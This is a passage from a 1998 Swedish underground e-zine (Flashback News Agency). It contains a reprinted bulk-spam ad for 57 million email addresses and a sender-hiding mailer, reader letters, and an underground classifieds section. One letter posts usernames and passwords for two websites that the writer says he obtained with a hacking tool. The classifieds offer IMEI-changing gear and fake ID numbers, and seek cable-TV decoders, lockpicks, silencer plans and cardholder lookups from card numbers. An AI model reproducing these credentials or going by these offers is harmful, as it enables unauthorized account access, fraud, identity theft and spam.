selling you their product....it works ! I will even tell you how to
mail them with easy to follow step-by-step instruction I include with
every order. These 57 Million email addresses are yours to keep, so you
can use them over and over and they come on 1 CD.
I will also include the stealth mailer - this is a full version of the
incredibly fast mailing program that hides your email address when you
send mail so no one will find out where it came from and you won't lose
your dial up account. The stealth mailer is an incredible program and
absolutly FREE with your order !
If you are not making at least $50,000 a month, then ORDER NOW.
ORDER NOW BY FAX: Simply print out this order form and fax it to us
along with your check made payable to: Cyber Bulk for only $99. Our
Fax # is: 760 430 2220

We will confirm your order by email and then mail your cd out via
priority mail.

Name:_____________________________

Street Address:______________________________

City:_____________________

State:________________ZipCode:_____________

Phone number:__________________________

Email:_______________________________

Tape your check here. Returned checks are subject to $25 NSF Fee.
        Fax it to  760 430 2220
                Or
You can mail a check or money order to:

Cyber Bulk
167 Hamilton ST
Oceanside, CA 92054

If you want to be removed from our mailing list just send a email here

+++

Spam King

**************************************************************************

 RE: CITAT

Citatet "Övertygelser är ett större hot mot sanningen än lögnen." som
förekom i FNA #101 är inte av någon "okänd". Det var Friedrich Nietzsche
som sa (eller skrev?) det.

Källor: http://www.innocence.com/~durrell/sig.html
    http://home5.swipnet.se/~w-50805/quotes/index.html

/Lars

**************************************************************************

 RE: ICQ

> det är omöjligt att upptäcka Frodo innan informationen förstörts och
> han klarar av att angripa alla filtyper.

Den som skrivit ovanstående är totalt okunnig om virus. Det är självklart
möjligt att upptäcka ett virus innan det gör skada! Dessutom verkar det
ganska dåligt att det inte anges vilken dator det gäller (PC antagligen,
vanligast), och vad den infekterar (MS-Office dokument, windows 16 bit,
windows 32 bit [NT, 95, 98], ms-dos EXE/COM, linux-elf, bootsektor, MBR är
några exempel på vad om kan infekteras på en pece...)

Är ni oroliga för virus, läs VLAD, Insane Reality, Nuke Info-Jurnals och
allt vad dessa virii-magazine heter så att ni lär er åtmistone grunderna i
vad virus är och hur det fungerar, så får ni en viss förmåga att se igenom
rena skrönor.

bluefish

**************************************************************************

 RE: FOLKMORD I PROFITENS TECKEN

Läste just din insändare i Flashback#101.
Vad jag inte förstår är vad du har imot Shell. Visst har dom inte
samma policy i alla länder i världen, för att det inte fungerar på
samma sätt i alla länder, tyvärr. Man måste respektera seden dit
man kommer...även om den är så vidrig som du beskriver den.

Shell är ett stort företag med viss kraft att tycka saker men
dom kan inte (och tjänar inte på det heller) vända på sättet
att göra saker i tex Nigeria. Om Shell skulle kräva av Nigeria att
visa en politik som strängt kontrollerar vart avfall dumpas samt
att minoriteter inte skadas av Shells utbyggnader så skulle
Shell få lämna landet totalt.

Shell har med all säkerhet försökt få reda på var dom kan dumpa
avfall och liknande vid behov (på grund av att göra det på lagliga
medel kostar ofantliga mängder pengar och höjer bara bensinpriset)
av Nigerias styre. Nigeria svarar vart dom kan dumpa sin smörja
vilket Shell lyder. Punkt. Shell är ett företag som alla andra.
Företag har ett enda mål......profit. Profit gör att folk överlever,
lever och ibland lever lite för bra än dom förtjänar. Men detta är
livet.

Givetvis är det helt oacceptabelt att skräpa ner vår planet i onödan.
Men oroa dig inte. Blir Jorden för nersotat finns det bara en
förlorare. Människan.

Att banka på Shell har mycket lite betydelse. Dina åsiker är som
kommunismen. Fin tanke men inte långt om länge genomtänkt.
Utan dagens nerskräpning av tex trafik, macdonaldspapper,
rengöringsmedel, målarfärgsburkar från att måla samtliga saker vi
köper och så vidare, så skulle vårt sätt att leva få sträcka sig
tillbaka till sen stenålder.

Nerskräpning av jorden började redan före år 0. Viadukterna i Rom tex.
Så fort det finns platsen som man kan 'dumpa' saker och falskt tro att
det försvinner så kommer nerskräpning finnas till (olja är inget nytt
påhitt).

Men jag håller med dig om att vi borde hitta bättre vägar...kanske
en komplett lösning till hur vi kan göra rent radiaoaktivt avfall
till ofarligt kisel (småsten som ligger i uppfarter på fina hus).

Ingenting är omöjligt....men att tracka ner på Shell som du gör tycker
jag är rent sakt barnsligt.

Jonas Hansson

**************************************************************************

 PASSWORDS

Mors!

Lösenord jag har hittat med hjälp av WWW Hack (som ni hade med i något
nummer)

http://www.swedishgirls.com Anvnamn & pwd: Matthew

http://www.2sexy.com Anvnamn & pwd: zxcvbn

Om det nu kan vara till någon nytta, vad vet väl jag...Hursomhelst,
information skall vara fri.

CY£Uß

__________________________________________________________________________


26. SVARTA BÖRSEN (KÖPES & SÄLJES)
==========================

 # S Ä L J E S

Utrustning för att låsa upp ericsson telefoner.
Man kan byta IMEI nummer och ta bort telefonlås.
Pris: 3500 kronor
Email: sorder@hotmail.com

Ritning på hembrännare enligt lågtryck och återrinnings principen.
Email: django75@hotmail.com

Markeringsätare
Ritningen till den nya Markeringsätaren som klarar AXE-systemet.
Endast 70:- plus postförskottsavg.
Email: pelle62@hotmail.com

Northern Lights #5
Cannabis frön.
Billiga priser och bra kvalitet!
Email: weed_us@hotmail.com

Videofilmer.
Har ett ganska stort utbud med blandannat filmer som :
Djävulens Advokat, I Know What You Did Last Summer, Jackie Brown,
The Jackal, L.A. Confidential, Tomorrow Never Dies.
Pri: 65kr per film.
Email: xman77@hotmail.com

1 st Telia dekoder i orginalkartong, helt orginal ej ombyggd.
Högstbjudande eller byte mot något musik/dator relaterat.
Email: peder25@hotmail.com

Cigg på postorder
Email: hn@oden.se

Svarta Dr Martens 10-hålskängor med stålhätta
Stlk 9 = 43-44. Helt nya och oanvända. Pris 600:-
Stockholmsområdet
Email: benway@bigfoot.com

Cigaretter
Alla märken, 220.-/limpan
Minst 3 limpor (6, 9, 12...).
Portofritt. Förskottsbetalning.
Email: peterkarls@altavista.net

Spel och Nyttoprogram.
Stort utbud, bra priser.
Email: cdskivor@mail12.calypso.net

Nya Filmer
80-100:-st inkl band & frakt.
Email: powerball@rocketmail.com

HK Movie Society
Importerade original Hong Kong videofilmer till mycket bra pris!
Alla filmer är av högsta kvalite. Widescreen och engelsk text.
Email: m.stenman@swipnet.se

Personnummer
Pris: 15 kr/st. Skriv hur gammal du vill vara och när du vill vara född.
Email: hata_felia@hotmail.com


 # K Ö P E S

BMWs dataprogram.
BMWs program för att testa motorn, ställa tillbaka servicmätaren
och milen. Utrustning alternativt tjänsten köpes.
Email: hmon@mail.film.su.se

Information om Nationella Insattsstyrkan & SÄPO.
Email: oskarv@hotmail.com

Telia Kabel TV-dekoder
Helst självuppdaterande. Max: 1200:-
Allt ska funka.
Email: flodhasten@hotmail.com

Telia Kabel-TV dekoder
Jag vill köpa en komplett dekoder till Telia Kabel-TV nätet
för alla kanaler. Till ett bra pris.
Email: anfro@wmdata.com

Stjärn TV dekoder
Email: telia666@hotmail.com

Dyrkar av alla slag.
Med beskrivning, gärna dyrkpistol.
Email: Kexman@hotmail.com

Slutproven i teori för flygcertifikat (A-cert)
Email: svin47@hotmail.com

Sprit
Email: Mekka@hotmail.com

Telia Kabel-Tv Dekoder till vettigt pris.
Gärna en som är själuppdaterande. Inga fantasipriser tack.
Email: kidcurry@home.se

Nationalteatern video
Nästan alla band på hultsfreds festivalen filmas. 1995 var
Nationalteatern där och om dom filmades vill jag väldigt gärna
köpa den videon... Också intresserad av Ramones videon från
Johanneshov 1991
Email: progge@hem2.passagen.se

Billiga EU Cigaretter
Email: hn@oden.se

Telia kabel-TV dekoder.
Helst självuppdaterande.
Email: soeze@hotmail.com

E-mail-adresser
Exemplelvis alla Algonets eller Telenordias kunder.
Email: revben@hotmail.com

VHS filmer, oklippta.
Behöver ej vara svensk text, förutsatt att de talar engelska i filmen.
Är främst på jakt efter filmer som Evil Dead 1/2. Bra kvalité.
Email: knaglfar@ThePentagon.com

Körkortsproven.
Email: to_eazy@rocketmail.com

Billiga cigaretter!
Jag kan köpa ganska stora partier regelbundet!
Email: klydd@hotmail.com

Dyrkset.
Email: kim_h@hotmail.com

EU körkort
Email: idcardneeded@hotmail.com

Info om hur man med hjälp av ett kreditkortsnummer kan få reda
på kortinnehavarens namn och hemadress.
Email: live_life@hotmail.com

Ljuddämpare.
Till gevär, el ritning..
Email: cjl@death-star.com

Telia-Kabel TV dekoder
Komplett fungarande, bra pris...
Email: ovfe@hotmail.com

Dyrkset
Email: charluuz@hem1.passagen.se

Information angående hackade Telefonkort och Comviq-Kontant-Kort.
Email: Simon_Karlsson@Yahoo.com

Stora volymer av email adresser.
Email: hn@oden.se

Telia kabel-TV dekoder.
Färdig dekoder till telias kabel-TV nät.
Helst självuppdaterande. Inga fantasipriser.
Email: enfonso@hotmail.com

 # B Y T E S

Synthvideos
Byter videos (även live) med synthmusik. Har Front 242 (tre filmer),
Skinny Puppy, Klinik, Cabs o.s.v.
Email: funkervogt@kurir.net


 # Ö V R I G T

Hyr extra e-mail adress anonymt för 99:-/år.
Email: hn@oden.se

Har två Poker o två Fruktmaskiner men inget bra ställe att placera
ut dom på. Har du nåt bra ställe så delar vi 50/50.
Kan bli mycket stora pengar på rätt ställe.
Email: pelle66@hotmail.com

_______________________________________________________

Vill du annonsera i FNA? Skicka då annonsen till: fna@flashback.se enligt
formulärets uppbyggnad nedan:

Rubrik: (högst 50 nedslag)
Annons: (högst 300 nedslag)
Emailadress:

Annonser som skickas html-kodade eller är uppenbart olagliga refuseras. Endast
annonser med någon form av undergroundanknytning publiceras. Undvik att skriva
annonsen med endast versaler (stora bokstäver).

__________________________________________________________________________

27. LINKS TO THE UNDERGROUND
==========================

Softwarez Inc:
http://travel.to/softwarez
(Warez & MP3 till salu)

CD 4 Fun:
http://members.tripod.com/~cd4fun/index.html
(Mer Warez till salu)

[Bidragsgivare: Micke]

__________________________________________________________________________

28. SMÅTT & GOTT
==========================

"Redan de gamla grekerna trodde sig leva i nutiden"

"Brinn så länge du lever. Låt ingen släcka din glöd. Brinn så alla kan se
dig. Vägra va' levande död"

"Politiker säger: Alkoholen är din fiende. Gud säger: Älska din fiende"

"Njut av livet... Det går inte i repris!"

[Bidragsgivare: Calle, GREN, Mattias & Pelle Rylander]

__________________________________________________________________________

Vet du om någon intressant nyhet eller känner till någon kul notis. Maila
den då gärna till: fna@flashback.se.
__________________________________________________________________________

F L A S H B A C K  N E W S  A G E N C Y ( F N A ) / F L A S H B A C K :

Postadress------------------- Flashback, Box 676, 114 79 Stockholm, Sweden
Email (Flashback)---------------------------------- flashback@flashback.se
Email (FNA)---------------------------------------------- fna@flashback.se
WWW (Flashback)----------------------------------- http://www.flashback.se
WWW (Flashback Community)------------------------ http://www.flashback.net
IRC-------------------------------------------------- #flashback (irc.net)
Usenet------------------------------------------------------ alt.flashback
FTP------------------------------------------------------ ftp.flashback.se
Gopher------------------------------------------------ gopher.flashback.se
Fax--------------------------------------------------------- 08-503 111 03

Postgiro------------------------------------------------------- 39 64 28-5
Bankgiro-------------------------------------------------------- 5355-6866

_______________________________________________________

P R E N U M E R A T I O N - F N A : G R A T I S

Starta prenumeration på FNA:
Skicka meddelandet "subscribe FNA-L" till: majordomo@flashback.se

Avsluta prenumeration på FNA:
Skicka meddelandet "unsubscribe FNA-L" till: majordomo@flashback.se

Vid byte av email-adress måste du först avsluta din gamla adress, och sedan
förnya din nya enligt rutinen ovan. Observera att all hantering av
prenumeranter sköts automatiskt, och *INTE* manuellt. Du kan m.a.o. *INTE*
ansöka om en prenumeration till adressen: fna@flashback.se.

_______________________________________________________

P R E N U M E R A T I O N - F L A S H B A C K ( 3 N U M M E R )

 Sverige: 150kr (Stödprenumeration: 200kr)
 Norden: 200kr
 Europa: 250kr
 Världen: 275kr

+ + +

© NO copyright / NO rights reserved - FLASHBACK 1998
FLASHBACK 1983-1998: 15 YEARS OF UNDERGROUND - AND STILL IN THE BUSINESS

  *  *  *  *  *  *  *  *  *  *